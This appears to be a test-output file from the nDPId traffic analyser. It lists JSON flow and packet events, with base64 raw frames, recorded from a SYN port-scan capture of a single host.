+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsxl0AACUGXRWsEAAIQA2GNIzTAB7dU4MZAAAAAGACCAAwbgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtIAADIG16CsEAAIQA2GNIzTBAPdU4MZAAAAAGACDAAoiQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsn5YAADcGcdysEAAIQA2GNIzTH0DdU4MZAAAAAGACEAAJTAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059156,"pkt":"ACYLMQczACWzv5HuCABFAAAsHnAAADgG8gKsEAAIQA2GNIzTwBjdU4MZAAAAAGACBAB0cwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsrbQAADEGab6sEAAIQA2GNIzTAFLdU4MZAAAAAGACCAAwOgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs2p4AADMGOtSsEAAIQA2GNIzTCHHdU4MZAAAAAGACEAAgGwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAshOQAACUGno6sEAAIQA2GNIzTJMfdU4MZAAAAAGACCAALxQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsIo8AADgG7eOsEAAIQA2GNIzTEB7dU4MZAAAAAGACBAAkbgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsVrUAAC0GxL2sEAAIQA2GNIzT4cXdU4MZAAAAAGACCABOxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADkGAmWsEAAIQA2GNIzTGMrdU4MZAAAAAGACCAAXwgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAse1MAACYGpx+sEAAIQA2GNIzTCvDdU4MZAAAAAGACDAAhnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAscl4AACwGqhSsEAAIQA2GNIzTEjbdU4MZAAAAAGACBAAiVgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsjp0AADcGgtWsEAAIQA2GNIzTHj3dU4MZAAAAAGACEAAKTwAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsTWIAAC8GzBCsEAAIQA2GNIzTAtbdU4MZAAAAAGACEAAltgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNuUAACUG7I2sEAAIQA2GNIzTA5DdU4MZAAAAAGACCAAs\/AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAsRV0AACwG1xWsEAAIQA2GNIzTPX7dU4MZAAAAAGACBAD3DQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059220,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DsAADUGPzesEAAIQA2GNIzTZIbdU4MZAAAAAGACCADMBQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAshVsAADgGixesEAAIQA2GNIzTBw3dU4MZAAAAAGACBAAtfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs1uMAACsGRo+sEAAIQA2GNIzTIcvdU4MZAAAAAGACEAAGwQAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsgrAAADsGisKsEAAIQA2GNIzSAobdUoMYAAAAAGACEAAmCQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs298AADUGN5OsEAAIQA2GNIzSK2fdUoMYAAAAAGACCAAFKAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMQEAACkG7nGsEAAIQA2GNIzSJtjdUoMYAAAAAGACCAAJtwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs4TUAACcGQD2sEAAIQA2GNIzSB0bdUoMYAAAAAGACEAAhSQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAssXUAADAGZv2sEAAIQA2GNIzSH6TdUoMYAAAAAGACBAAU6wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 